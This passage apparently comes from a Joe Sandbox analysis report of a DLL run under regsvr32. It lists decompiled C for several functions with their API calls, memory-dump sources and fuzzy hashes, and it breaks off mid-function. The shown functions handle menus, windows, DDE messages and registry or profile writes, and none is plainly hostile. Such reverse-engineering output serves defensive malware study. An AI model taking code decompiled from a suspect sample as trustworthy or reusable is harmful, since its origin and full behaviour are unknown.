                                                                                                            • Opcode ID: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                                                            • Instruction ID: d9b79505f63fc07e8b5b8f3565facbd5cf555a7e12dc77f8d6b56f2636bb58fe
                                                                                                            • Opcode Fuzzy Hash: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                                                            • Instruction Fuzzy Hash: 8431B434A02609AFCB63DBB58C65D6FF6E8EF80787F104419B445DA163CB30A980D762
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002A1CA Relevance: 9.1, APIs: 6, Instructions: 69windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002A1CA(void* __ecx) {
				struct HACCEL__* _t25;
				void* _t44;
				void* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t48;

				_t44 = __ecx;
				_t40 = __ecx + 0x60;
				_t25 =  *(__ecx + 0x60);
				_t45 = 0;
				if( *((intOrPtr*)(_t25 - 0xc)) == 0) {
					_t25 = E10006A60(_t40,  *((intOrPtr*)(__ecx + 0x3c)));
				}
				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
					_t48 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					 *(_t44 + 0x30) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
					_t47 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					 *(_t44 + 0x38) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
					_t46 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					 *(_t44 + 0x28) = _t25;
				}
				return _t25;
			}









                                                                                                            0x1002a1cd
                                                                                                            0x1002a1cf
                                                                                                            0x1002a1d2
                                                                                                            0x1002a1d4
                                                                                                            0x1002a1da
                                                                                                            0x1002a1df
                                                                                                            0x1002a1df
                                                                                                            0x1002a1f3
                                                                                                            0x1002a1ff
                                                                                                            0x1002a20a
                                                                                                            0x1002a213
                                                                                                            0x1002a215
                                                                                                            0x1002a218
                                                                                                            0x1002a218
                                                                                                            0x1002a21d
                                                                                                            0x1002a229
                                                                                                            0x1002a234
                                                                                                            0x1002a23d
                                                                                                            0x1002a23f
                                                                                                            0x1002a242
                                                                                                            0x1002a242
                                                                                                            0x1002a247
                                                                                                            0x1002a253
                                                                                                            0x1002a25e
                                                                                                            0x1002a267
                                                                                                            0x1002a269
                                                                                                            0x1002a269
                                                                                                            0x1002a270

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$AcceleratorsMenu
                                                                                                            • String ID:
                                                                                                            • API String ID: 144087665-0
                                                                                                            • Opcode ID: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                                                            • Instruction ID: 79ec512449ce6a4c7bf2710ae8ff5bed15bebc86ac40dbf708adfd4365bfde7a
                                                                                                            • Opcode Fuzzy Hash: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                                                            • Instruction Fuzzy Hash: 8821EA75401B18DFC3B0EF6A9940937F3F8FF09651751446FEA8A86912DA36F890DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002B105 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B105(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1002B0CC();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x1c);
					goto L7;
				}
				_t13 = E10006C53();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                                                            0x1002b10d
                                                                                                            0x1002b115
                                                                                                            0x1002b117
                                                                                                            0x1002b134
                                                                                                            0x1002b142
                                                                                                            0x1002b14d
                                                                                                            0x1002b14f
                                                                                                            0x1002b151
                                                                                                            0x1002b153
                                                                                                            0x1002b15e
                                                                                                            0x1002b160
                                                                                                            0x1002b16d
                                                                                                            0x1002b16d
                                                                                                            0x1002b16f
                                                                                                            0x1002b175
                                                                                                            0x1002b179
                                                                                                            0x1002b197
                                                                                                            0x1002b18a
                                                                                                            0x1002b18d
                                                                                                            0x1002b18f
                                                                                                            0x1002b18f
                                                                                                            0x1002b179
                                                                                                            0x1002b1a0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b155
                                                                                                            0x1002b155
                                                                                                            0x1002b156
                                                                                                            0x1002b158
                                                                                                            0x1002b15a
                                                                                                            0x00000000
                                                                                                            0x1002b155
                                                                                                            0x1002b147
                                                                                                            0x1002b149
                                                                                                            0x1002b14b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b14b
                                                                                                            0x1002b119
                                                                                                            0x1002b120
                                                                                                            0x1002b12f
                                                                                                            0x1002b12f
                                                                                                            0x00000000
                                                                                                            0x1002b12f
                                                                                                            0x1002b122
                                                                                                            0x1002b129
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b12b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                            • String ID:
                                                                                                            • API String ID: 670545878-0
                                                                                                            • Opcode ID: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                                                            • Instruction ID: ef498eb2053f32fc83163eb1be06eb9c016c70d7a0359ba6d8f1e9348af6cf1d
                                                                                                            • Opcode Fuzzy Hash: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                                                            • Instruction Fuzzy Hash: E111A332601F764FD362DA6AACA4B2B77DCDF41BD1FD20159EC04D7211DB60EC104290
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002B501 Relevance: 9.1, APIs: 6, Instructions: 57registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B501(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x64));
				}
				if(_a8 != 0) {
					_t28 = E10035959(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E100358C8(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}





                                                                                                            0x1002b50a
                                                                                                            0x00000000
                                                                                                            0x1002b58b
                                                                                                            0x1002b510
                                                                                                            0x1002b539
                                                                                                            0x1002b53b
                                                                                                            0x1002b54f
                                                                                                            0x1002b51d
                                                                                                            0x00000000
                                                                                                            0x1002b51d
                                                                                                            0x1002b567
                                                                                                            0x1002b56d
                                                                                                            0x1002b570
                                                                                                            0x00000000
                                                                                                            0x1002b57a
                                                                                                            0x1002b53f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b545
                                                                                                            0x00000000
                                                                                                            0x1002b545
                                                                                                            0x1002b517
                                                                                                            0x1002b51b
                                                                                                            0x1002b525
                                                                                                            0x00000000
                                                                                                            0x1002b525
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1002B525
                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 1002B545
                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10024C29,?), ref: 1002B570
                                                                                                              • Part of subcall function 100358C8: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                                                              • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                                                              • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                                                              • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                                                              • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B58B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 1886894508-0
                                                                                                            • Opcode ID: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                                                            • Instruction ID: c8f527a64b8234d0edd8db9930868310c0db2fd70ee1d53d59517915cf010f6f
                                                                                                            • Opcode Fuzzy Hash: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                                                            • Instruction Fuzzy Hash: D1114832401E79FFDB128F61DC48F9E3BA9EF043A1F814510FD049D061CB328A61AB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10031F4A Relevance: 9.1, APIs: 6, Instructions: 56stringwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 46%
                                                                                                            			E10031F4A(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v528;
				void* _v532;
				char _v536;
				intOrPtr _t15;
				long _t22;
				void* _t25;
				void* _t29;

				_t15 =  *0x1004c470; // 0xf3933a06
				_v8 = _t15;
				_push( &_v532);
				_push( &_v536);
				_push(_a8);
				_push(0x3e8);
				_t29 = __ecx;
				L1001CA38();
				if(lstrlenA(GlobalLock(_v532)) < 0x208) {
					_t22 = GlobalUnlock(_v532);
					_push(_v532);
					_push(0x8000);
					_push(0x3e4);
					_push(0x3e8);
					_push(_a8);
					L1001CA32();
					PostMessageA(_a4, 0x3e4,  *(_t29 + 0x1c), _t22);
					if(E100203CE(_t29) != 0) {
						_t25 = E100373B5();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)))) + 0xa0))( &_v528);
					}
				}
				return E100117AE(0, _v8);
			}











                                                                                                            0x10031f53
                                                                                                            0x10031f5a
                                                                                                            0x10031f63
                                                                                                            0x10031f6a
                                                                                                            0x10031f6b
                                                                                                            0x10031f73
                                                                                                            0x10031f74
                                                                                                            0x10031f76
                                                                                                            0x10031f93
                                                                                                            0x10031f9c
                                                                                                            0x10031fa2
                                                                                                            0x10031fad
                                                                                                            0x10031fb2
                                                                                                            0x10031fb3
                                                                                                            0x10031fb4
                                                                                                            0x10031fb7
                                                                                                            0x10031fc4
                                                                                                            0x10031fd4
                                                                                                            0x10031fd6
                                                                                                            0x10031fe9
                                                                                                            0x10031fe9
                                                                                                            0x10031fd4
                                                                                                            0x10031ffc

                                                                                                            APIs
                                                                                                            • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 10031F76
                                                                                                            • GlobalLock.KERNEL32 ref: 10031F81
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10031F88
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 10031F9C
                                                                                                            • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10031FB7
                                                                                                            • PostMessageA.USER32 ref: 10031FC4
                                                                                                              • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 462239228-0
                                                                                                            • Opcode ID: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                                                            • Instruction ID: bfbb9d00b13f65a0ab326070f2ebd1bafe94df8b281a4b7973d805b3987b007f
                                                                                                            • Opcode Fuzzy Hash: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                                                            • Instruction Fuzzy Hash: 8D111C3554121CAFDB12DFA1DC88DDE7BB9FF55351F0045A5F809EA262DA34DE808B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10029BA4 Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10029BA4(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t6;
				struct HWND__* _t11;
				struct HWND__* _t14;

				_t3 = GetFocus();
				_t14 = _t3;
				if(_t14 != 0) {
					_t11 = _a4;
					if(_t14 == _t11) {
						L10:
						return _t3;
					}
					if(E10029A8E(_t14, 3) != 0) {
						L5:
						if(_t11 == 0 || (GetWindowLongA(_t11, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t14, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t11);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t14);
					_t14 = _t3;
					if(_t14 == _t11) {
						goto L9;
					}
					_t3 = E10029A8E(_t14, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}







                                                                                                            0x10029ba5
                                                                                                            0x10029bab
                                                                                                            0x10029baf
                                                                                                            0x10029bb2
                                                                                                            0x10029bb8
                                                                                                            0x10029c16
                                                                                                            0x00000000
                                                                                                            0x10029c16
                                                                                                            0x10029bcb
                                                                                                            0x10029be2
                                                                                                            0x10029be4
                                                                                                            0x10029c05
                                                                                                            0x10029c0f
                                                                                                            0x00000000
                                                                                                            0x10029bf6
                                                                                                            0x10029bf7
                                                                                                            0x10029bfb
                                                                                                            0x10029c03
                                                                                                            0x10029c15
                                                                                                            0x00000000
                                                                                                            0x10029c15
                                                                                                            0x00000000
                                                                                                            0x10029c03
                                                                                                            0x10029be4
                                                                                                            0x10029bce
                                                                                                            0x10029bd0
                                                                                                            0x10029bd4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10029bd9
                                                                                                            0x10029be0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10029be0
                                                                                                            0x10029c18

                                                                                                            APIs
                                                                                                            • GetFocus.USER32(?,10032120,?), ref: 10029BA5
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            • GetParent.USER32(00000000), ref: 10029BCE
                                                                                                              • Part of subcall function 10029A8E: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                                                              • Part of subcall function 10029A8E: lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                                                            • GetWindowLongA.USER32 ref: 10029BE9
                                                                                                            • GetParent.USER32(10032120), ref: 10029BF7
                                                                                                            • GetDesktopWindow.USER32 ref: 10029BFB
                                                                                                            • SendMessageA.USER32 ref: 10029C0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 2818563221-0
                                                                                                            • Opcode ID: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                                                            • Instruction ID: cea5fa679d97d2953b6d76dc507eb4c5e7da3a0c11b163d723fb81d4da4a6e61
                                                                                                            • Opcode Fuzzy Hash: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                                                            • Instruction Fuzzy Hash: 7FF0A932500A306EE353A62B6D88F5E61D8DF81BD0FB20214F459E6192EB24AC8145A9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10037A96 Relevance: 9.0, APIs: 6, Instructions: 47registrystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E10037A96(void* _a4, char* _a8, char* _a12) {
				void* _t14;
				long _t18;
				signed int _t20;
				long _t25;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						_t14 = 0;
						L7:
						return _t14;
					}
					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					_t18 = RegCloseKey(_a4);
					if(_t18 != 0 || _t25 != 0) {
						goto L6;
					} else {
						_t14 = _t18 + 1;
						goto L7;
					}
				}
				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}







                                                                                                            0x10037a9d
                                                                                                            0x10037ad8
                                                                                                            0x10037b0e
                                                                                                            0x10037b0e
                                                                                                            0x10037b10
                                                                                                            0x00000000
                                                                                                            0x10037b10
                                                                                                            0x10037afb
                                                                                                            0x10037afd
                                                                                                            0x10037b05
                                                                                                            0x00000000
                                                                                                            0x10037b0b
                                                                                                            0x10037b0b
                                                                                                            0x00000000
                                                                                                            0x10037b0b
                                                                                                            0x10037b05
                                                                                                            0x10037ab6
                                                                                                            0x10037abe
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10037AA2
                                                                                                            • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10037AB6
                                                                                                            • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10037AD0
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10037ADD
                                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10037AF2
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10037AFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Valuelstrlen$CloseCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 306239685-0
                                                                                                            • Opcode ID: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                                                            • Instruction ID: 36ac44db30e1571f4bd1a6b15574b4d5f9e82ccdf85d97020e0dea724d6fc6de
                                                                                                            • Opcode Fuzzy Hash: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                                                            • Instruction Fuzzy Hash: 4501043220016DFFEB235FA1DD48F9A7BA9FB08792F108410FE1AD9061D3718A60DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10029C98 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E10029C98(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}






                                                                                                            0x10029ca7
                                                                                                            0x10029cf8
                                                                                                            0x10029cf8
                                                                                                            0x10029cfa
                                                                                                            0x10029cfe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10029cc4
                                                                                                            0x10029cdb
                                                                                                            0x10029ce1
                                                                                                            0x10029cf3
                                                                                                            0x00000000
                                                                                                            0x10029d06
                                                                                                            0x10029cf3
                                                                                                            0x10029cf8
                                                                                                            0x10029cf8
                                                                                                            0x10029d03

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1315500227-0
                                                                                                            • Opcode ID: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                                                            • Instruction ID: 9b9f6f1c131c314e5c19284c1e668e0a3a9e33f7fca6b6c160f9dd0f3207debf
                                                                                                            • Opcode Fuzzy Hash: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                                                            • Instruction Fuzzy Hash: 7A01623650056ABFDB129F569C48EEE37ADEF017D0F514115FD11EA161D730DA01DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001B36C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 167fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001B36C(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t79;
				void* _t82;
				signed int _t86;
				signed int* _t89;
				long _t90;
				void* _t92;
				intOrPtr _t93;
				signed int _t97;
				intOrPtr _t98;
				char _t100;
				signed int _t101;
				long _t103;
				long _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed char _t117;
				intOrPtr _t118;
				long _t120;
				void* _t124;
				intOrPtr* _t125;
				signed int _t127;
				signed char* _t128;
				void* _t129;
				void* _t130;

				_v12 = _v12 & 0x00000000;
				_t113 = _a8;
				_t124 = _t113;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t79 = _a4;
				_t125 = 0x1004f920 + (_t79 >> 5) * 4;
